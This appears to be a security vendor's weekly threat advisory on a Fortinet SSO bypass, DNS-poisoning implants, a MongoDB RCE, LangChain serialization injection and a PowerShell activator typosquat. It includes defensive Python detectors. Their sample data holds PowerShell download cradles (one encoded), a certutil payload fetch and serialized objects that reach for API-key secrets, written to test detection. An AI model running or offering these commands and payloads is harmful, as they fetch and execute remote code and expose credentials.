SSO Bypass, DNS Poisoning, MongoDB RCE & Typosquat PowerShell Loader

SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories also provide information and recommendations that help security teams take appropriate action against the latest critical threats.

1. SSO trust broken: Fortinet SAML bypass goes live

Attackers are abusing the FortiCloud SSO login path with crafted SAML responses to reach the administrative interface without valid credentials, then exporting device configurations for follow-on abuse. Treat any unpatched, SSO-enabled perimeter device as potentially compromised until it is patched and SSO is locked down.

  • Fortinet FortiGate SSO auth bypass (CVE-2025-59718/59719) — A crafted SAML exchange on the FortiCloud SSO path is accepted before authentication and yields administrator access; weaponization was observed rapidly after disclosure, with device configurations exfiltrated after login. Patch to the fixed builds and disable FortiCloud SSO until that is done.

2. Infrastructure-in-the-middle: DNS poisoning delivers stealthy implants

Espionage-focused actors are poisoning DNS and hijacking "trusted" software-update flows to deliver loaders that decrypt per-victim payloads and then persist inside legitimate processes for long-term collection.

  • Evasive Panda → MgBot — DNS poisoning and adversary-in-the-middle redirection send legitimate update requests to attacker infrastructure; multi-stage loaders then drop the modular MgBot backdoor, which is injected into svchost.exe and provides file theft, keylogging and credential theft.
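The "DNS integrity" step under Proactive Steps (alert when update domains resolve to new or rare IPs) can be turned into a resolver-log check. The Python below is an added example written for this advisory, not tooling from the researchers, the affected vendor or SISA: it replays a constructed resolver-log excerpt against a constructed 30-day baseline of answers for watched update hosts and flags any answer that is outside the baseline or sits in a non-public range, the latter being what a LAN-side adversary-in-the-middle redirect of an update host looks like. The host names, log format, baseline and addresses are all invented for the demo; it runs offline on Python 3.9 or later.

```python
import ipaddress

# Constructed resolver log excerpt (not from the advisory); fields: ts client qname answer.
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges standing in for public IPs.
SAMPLE_RESOLVER_LOG = """\
2025-12-01T09:00:01Z 10.1.2.10 update.example-vendor.com 203.0.113.10
2025-12-01T09:05:12Z 10.1.2.11 update.example-vendor.com 203.0.113.10
2025-12-01T09:07:44Z 10.1.2.12 update.example-vendor.com 203.0.113.11
2025-12-01T10:15:03Z 10.1.2.13 cdn.example-vendor.com 203.0.113.20
2025-12-01T11:42:19Z 10.1.2.14 update.example-vendor.com 198.51.100.77
2025-12-01T12:03:05Z 10.1.2.15 update.example-vendor.com 192.168.1.50
2025-12-01T12:10:00Z 10.1.2.16 www.unrelated.example 203.0.113.99
"""

# Constructed 30-day baseline of answers previously seen for each watched update host.
BASELINE = {
    "update.example-vendor.com": {"203.0.113.10", "203.0.113.11"},
    "cdn.example-vendor.com": {"203.0.113.20"},
}

# Only update hosts are checked; unrelated names are ignored to keep the alert volume low.
WATCHED_UPDATE_HOSTS = set(BASELINE)

# Explicit non-public ranges. ipaddress's is_private is deliberately not used here: it also
# classifies the documentation ranges used above as private and would skew the demo.
NON_PUBLIC_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
)]


def is_non_public(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in NON_PUBLIC_NETS)


def parse_resolver_log(text: str) -> list[dict]:
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, answer = line.split()
        records.append({"ts": ts, "client": client,
                        "qname": qname.lower().rstrip("."), "answer": answer})
    return records


def find_anomalous_answers(text: str, baseline: dict, watched: set) -> list[dict]:
    """Return one alert per record whose answer for a watched update host is either
    outside the historical baseline or in a non-public range (a public update host
    resolving to a LAN address is a classic adversary-in-the-middle symptom)."""
    alerts = []
    for rec in parse_resolver_log(text):
        if rec["qname"] not in watched:
            continue
        reasons = []
        if is_non_public(rec["answer"]):
            reasons.append("non-public answer for a public update host")
        if rec["answer"] not in baseline.get(rec["qname"], set()):
            reasons.append("answer not in 30-day baseline")
        if reasons:
            alerts.append({**rec, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in find_anomalous_answers(SAMPLE_RESOLVER_LOG, BASELINE, WATCHED_UPDATE_HOSTS):
        print(a["ts"], a["client"], a["qname"], "->", a["answer"], "|", "; ".join(a["reasons"]))
```

In production the baseline would come from passive-DNS or resolver history rather than a literal, and a new answer should be confirmed against the vendor's published update endpoints or certificate pins before anyone assumes poisoning; the point of the check is to raise the question early, not to decide it.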

3. Core stack cracks: data layer and AI framework exploitation

Two pillars of modern applications, the datastore and the LLM framework, show how a single bug in a compression or serialization path can become secret theft, remote code execution and a broken trust boundary if those paths are not nailed shut.

  • MongoDB RCE (CVE-2025-14847) — A length-handling flaw in zlib-compressed wire-protocol messages enables unauthenticated remote code execution on vulnerable MongoDB servers; urgent upgrades are required across the 4.4 through 8.2 release lines.

  • LangChain Core serialization injection (CVE-2025-68664) — Because lc marker keys in user-supplied data were not escaped on serialization, attacker-controlled LLM output that is dumped and later loaded is interpreted as serialized objects, letting it instantiate classes, resolve environment secrets and subvert chains; upgrade and treat LLM output as untrusted data.
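"Treat LLM output as untrusted data" is concrete enough to code. The Python below is an added example written for this advisory, not code from the LangChain project or from SISA: it scans decoded model output for dicts shaped like LangChain's serialized objects (an integer lc version plus type and id keys, the layout the advisory's "lc keys" refers to) and replaces each one with its inert JSON text before the output goes anywhere near a serialize-and-reload step. The model output is constructed for the demo, the class path in it is invented, and the function names are the author's own; it runs offline on Python 3.9 or later.

```python
import json

# Constructed model output (not from the advisory). The "lc"/"type"/"id" layout mirrors
# the shape LangChain uses for serialized objects; an unpatched loads() that met the
# "metadata" entry and the second "citations" entry would treat them as objects, not data.
LLM_OUTPUT = json.dumps({
    "answer": "Here is the summary you asked for.",
    "metadata": {"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]},
    "citations": [
        {"title": "quarterly-report.pdf", "page": 3},
        {"lc": 1, "type": "constructor", "id": ["langchain", "example", "SomeClass"], "kwargs": {}},
    ],
})


def looks_like_lc_object(node) -> bool:
    # Minimal structural check: an integer "lc" version plus "type" and "id" keys.
    return isinstance(node, dict) and isinstance(node.get("lc"), int) \
        and "type" in node and "id" in node


def find_serialization_markers(node, path="$") -> list[tuple]:
    """Walk decoded JSON and return (path, type, id) for every lc-shaped dict found."""
    hits = []
    if isinstance(node, dict):
        if looks_like_lc_object(node):
            hits.append((path, node.get("type"), node.get("id")))
        for key, value in node.items():
            hits.extend(find_serialization_markers(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_serialization_markers(value, f"{path}[{i}]"))
    return hits


def neutralize(node):
    """Return a copy in which every lc-shaped dict is replaced by its JSON text, so the
    content survives as an inert string and can never be instantiated on a later load."""
    if isinstance(node, dict):
        if looks_like_lc_object(node):
            return json.dumps(node, sort_keys=True)
        return {k: neutralize(v) for k, v in node.items()}
    if isinstance(node, list):
        return [neutralize(v) for v in node]
    return node


def gate_llm_output(text: str) -> tuple[dict, list[tuple]]:
    """Parse model output and return (sanitized_object, markers_found). Call this before
    anything downstream stores, serializes or reloads the output."""
    obj = json.loads(text)
    hits = find_serialization_markers(obj)
    return neutralize(obj), hits


if __name__ == "__main__":
    clean, hits = gate_llm_output(LLM_OUTPUT)
    for path, kind, ident in hits:
        print(f"serialization marker at {path}: type={kind} id={ident}")
    print(json.dumps(clean, indent=2))
```

This gate is a belt-and-braces pre-check, not a substitute for the patch: upgrade LangChain Core and pass an allowed_objects allowlist when deserializing, as the Proactive Steps say, and keep the gate for the code paths that log, cache or forward model output to other systems.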

4. Typosquat trap: fake activators push PowerShell loaders

A look-alike domain for Microsoft Activation Scripts turns a single mistyped URL into a PowerShell-delivered loader that pivots to miners and RATs; a "quick fix" becomes a quick compromise.

  • Cosmali Loader via MAS typosquat — Users who reach get.activate[.]win instead of the legitimate MAS site pull a PowerShell script that installs the Cosmali loader, which in turn delivers a cryptominer or the XWorm RAT and scareware pop-ups that demand payment.
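The "Script abuse controls" step under Proactive Steps asks for EDR rules on encoded PowerShell and LOLBIN chains; the logic behind such a rule is small enough to show. The Python below is an added example written for this advisory, not a detection from any EDR vendor or from SISA: it walks a constructed set of process-creation events, decodes any -EncodedCommand argument the way powershell.exe does (base64 of UTF-16LE), scans the visible and decoded command lines for download-cradle and evasion tokens, and flags a PowerShell parent spawning a living-off-the-land binary. The events, the encoded cradle and the example.invalid URLs are all constructed; the typosquat domain appears in its defanged form exactly as the advisory gives it. Runs offline on Python 3.9 or later.

```python
import base64
import re

# Hypothetical download cradle, encoded at import time the way powershell.exe expects
# (UTF-16LE, then base64). Constructed for the demo; example.invalid never resolves.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED_CRADLE = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (not real telemetry): parent image, image, command line.
EVENTS = [
    {"pid": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -NoProfile -ExecutionPolicy Bypass -Command "irm https://get.activate[.]win | iex"'},
    {"pid": 2, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": f"powershell -w hidden -enc {ENCODED_CRADLE}"},
    {"pid": 3, "parent": "powershell.exe", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://example.invalid/miner.exe C:\\Users\\Public\\m.exe"},
    {"pid": 4, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1"},
    {"pid": 5, "parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob. "-ep" (ExecutionPolicy)
# does not match because the letter after -e must be c or n.
ENCODED_ARG = re.compile(r"(?i)(?<![\w-])-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{20,})")
CRADLE_TOKENS = re.compile(
    r"(?i)(?:\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|downloadfile|net\.webclient|frombase64string|bypass)\b"
    r"|-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden)")
LOLBINS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the command line has none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return None


def analyze(events: list[dict]) -> list[dict]:
    """Return a finding (pid, reasons, decoded payload) for every event that trips a rule."""
    findings = []
    for ev in events:
        reasons, text = [], ev["cmdline"]
        is_ps = ev["image"].lower() in POWERSHELL
        decoded = decode_encoded_command(text) if is_ps else None
        if decoded is not None:
            reasons.append("encoded PowerShell command")
            text = f"{text} {decoded}"          # scan the decoded payload as well
        tokens = sorted({t.group(0).lower() for t in CRADLE_TOKENS.finditer(text)})
        if is_ps and tokens:
            reasons.append("download-cradle/evasion tokens: " + ", ".join(tokens))
        if ev["parent"].lower() in POWERSHELL and ev["image"].lower() in LOLBINS:
            reasons.append(f"PowerShell spawned LOLBIN {ev['image']}")
        if reasons:
            findings.append({"pid": ev["pid"], "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"pid {f['pid']}: " + " | ".join(f["reasons"]))
        if f["decoded"]:
            print("   decoded:", f["decoded"])
```

The signed inventory script (pid 4) and the service host (pid 5) produce nothing, which is the property a rule like this has to keep in a real fleet; tune the token list against a week of your own PowerShell telemetry before turning alerts into blocks.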

Proactive Steps for the Week

  • Perimeter hardening: Patch Fortinet devices to the fixed releases; keep FortiCloud SSO disabled until the patch is verified; restrict the management interface to allow-listed IPs.

  • DNS integrity: Force clients through controlled resolvers and enable DNSSEC validation where feasible; alert when software-update domains resolve to new or rarely seen IPs; verify update signatures and certificate pins before installing.

  • Data & AI stack fixes: Upgrade MongoDB to 8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32 or 4.4.30 according to the release line in use; upgrade LangChain Core to a patched version and pass an allowed_objects allowlist when deserializing; never render Jinja2 templates with untrusted data.

  • Script abuse controls: Block untrusted PowerShell execution through execution policy and application control; add EDR rules for encoded PowerShell command lines and PowerShell-to-LOLBIN process chains; warn users away from unofficial activators and typosquatted sites.

  • Threat hunting: Hunt for Fortinet SSO admin logins originating from hosting-provider ASNs, svchost.exe injection consistent with MgBot, MongoDB instances reachable from outside their expected networks, and LangChain pipelines that serialize and reload LLM output or metadata.
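The MongoDB item in the step list names six fixed builds, one per release line, and a fleet sweep has to compare each host's db.version() string against the right one. The Python below is an added example written for this advisory, not a MongoDB or SISA tool: it encodes the fixed builds listed above, parses version strings including pre-release suffixes (8.0.17-rc0 is older than 8.0.17, so it counts as unpatched), refuses to call a line the advisory does not list "safe", and labels a constructed inventory. The host names and versions in the inventory are invented; it runs offline on Python 3.9 or later.

```python
# Minimum fixed builds per MongoDB release line, as listed in this advisory.
FIXED_BUILDS = {
    (8, 2): (8, 2, 3),
    (8, 0): (8, 0, 17),
    (7, 0): (7, 0, 28),
    (6, 0): (6, 0, 27),
    (5, 0): (5, 0, 32),
    (4, 4): (4, 4, 30),
}


def parse_version(text: str) -> tuple[tuple[int, int, int], bool]:
    """Parse a db.version()-style string into ((major, minor, patch), is_prerelease).
    A '-rc0'/'-alpha' suffix marks a pre-release that precedes the GA build of the same number."""
    core, _, suffix = text.strip().partition("-")
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised MongoDB version string: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return (major, minor, patch), bool(suffix)


def is_fixed(text: str):
    """True if the build is at or above the fixed release for its line, False if below,
    None if the line is not in the advisory's list (treat as unverified, never as safe)."""
    (major, minor, patch), prerelease = parse_version(text)
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return None
    version = (major, minor, patch)
    if version > fixed:
        return True
    if version == fixed:
        return not prerelease        # e.g. 8.0.17-rc0 is older than 8.0.17
    return False


def triage(inventory: dict) -> dict:
    """Map each host to patched / VULNERABLE / unverified line for a quick fleet sweep."""
    labels = {True: "patched", False: "VULNERABLE", None: "unverified line"}
    return {host: labels[is_fixed(ver)] for host, ver in inventory.items()}


# Constructed inventory (not from the advisory) as a fleet sweep would collect it.
SAMPLE_INVENTORY = {
    "db-prod-01": "7.0.28",
    "db-prod-02": "7.0.25",
    "db-analytics": "8.0.17-rc0",
    "db-legacy": "4.4.30",
    "db-lab": "8.1.2",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host:14} {SAMPLE_INVENTORY[host]:12} {status}")
```

The "unverified line" outcome is deliberate: a line absent from the advisory's fix list is neither known-good nor known-bad, and the right move is to check the vendor's own notice for it rather than let a version comparison quietly mark it patched.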

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
